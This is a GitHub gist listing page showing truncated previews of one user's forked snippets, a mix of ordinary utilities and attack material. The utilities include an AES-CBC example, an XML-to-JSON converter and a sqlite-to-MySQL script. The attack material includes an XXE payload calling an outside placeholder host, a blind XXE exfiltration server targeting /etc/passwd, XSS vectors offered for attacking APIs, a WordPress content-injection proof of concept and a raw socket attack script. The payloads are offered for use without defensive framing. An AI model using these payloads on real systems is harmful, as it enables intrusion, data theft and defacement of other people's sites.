0x24bin 0x24bin
0x24bin
/ XXE_payloads
Created
March 9, 2019 09:02
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
0x24bin
/ blindxxe.py
Created
July 5, 2018 01:39
— forked from mgeeky/blindxxe.py
Blind XXE (External XML Entity) attacker's server - to be used in blind XXE data exfiltration (like in Play Framework or Ruby on Rails)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Simple Blind XXE server intended to handle incoming requests for | |
| # malicious DTD file, that will subsequently ask for locally stored file, | |
| # like file:///etc/passwd. | |
| # | |
| # This program has been tested with PlayFramework 2.1.3 XXE vulnerability, | |
| # to be run as follows: | |
| # |
0x24bin
/ 666_lines_of_XSS_vectors.html
Created
April 4, 2018 09:44
— forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
0x24bin
/ aes-cbc.py
Created
June 5, 2017 06:03
— forked from lopes/aes-cbc.py
Simple Python example of AES in CBC mode.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from hashlib import md5 | |
| from base64 import b64decode | |
| from base64 import b64encode | |
| from Crypto import Random | |
| from Crypto.Cipher import AES | |
| # Padding for the input string --not | |
| # related to encryption itself. | |
| BLOCK_SIZE = 16 # Bytes |
0x24bin
/ XMLtoJSON.py
Created
June 3, 2017 03:03
— forked from smihica/XMLtoJSON.py
Xml to JSON parser-converter in Python.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python -S | |
| # -*- coding: utf-8 -*- | |
| import sys | |
| import re | |
| import xml.sax | |
| import io # for 2.6 | |
| import StringIO # for 3.0 | |
| # | |
| # ** If your python is 2.x and xml-cording is utf-8 set follows. |
0x24bin
/ inject.py
Created
February 8, 2017 09:31
— forked from leonjza/inject.py
Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # 2017 - @leonjza | |
| # | |
| # Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC | |
| # Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html | |
| # Usage example: | |
| # | |
| # List available posts: | |
| # | |
| # $ python inject.py http://localhost:8070/ |
0x24bin
/ gist:c0e3d15e83181a4a0c066da8d4b1e95e
Created
January 3, 2017 02:18
— forked from anonymous/gist:9897cd3c38490a7f68f4996f91367a86
Split lines from file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| def split_into_groups(iterable, group_size): | |
| """Split an iterable collection into groups with fixed size. | |
| Yield | |
| ----- | |
| list[any] | |
| Groups of elements. | |
| """ |
0x24bin
/ sqlite2mysql.pl
Created
October 11, 2016 11:42
— forked from wavezhang/sqlite2mysql.pl
scripts to change sqlite3 db into mysql format
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/perl | |
| # | |
| # based on https://stackoverflow.com/a/87531/5742651 | |
| # usage: sqlite3 .dump database_name.sqlite3 | perl sqlite2mysql.pl | mysql -u root -p $import_database_name | |
| # | |
| # ignore follow lines: | |
| # BEGIN TRANSACTION | |
| # COMMIT | |
| # sqlite_sequence | |
| # CREATE UNIQUE INDEX |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket, sys, os | |
| print "][ Attacking " + sys.argv[1] + " ... ][" | |
| print "injecting " + sys.argv[2]; | |
| def attack(): | |
| #pid = os.fork() | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect((sys.argv[1], 80)) | |
| print ">> GET /" + sys.argv[2] + " HTTP/1.1" | |
| s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n") | |
| s.send("Host: " + sys.argv[1] + "\r\n\r\n"); |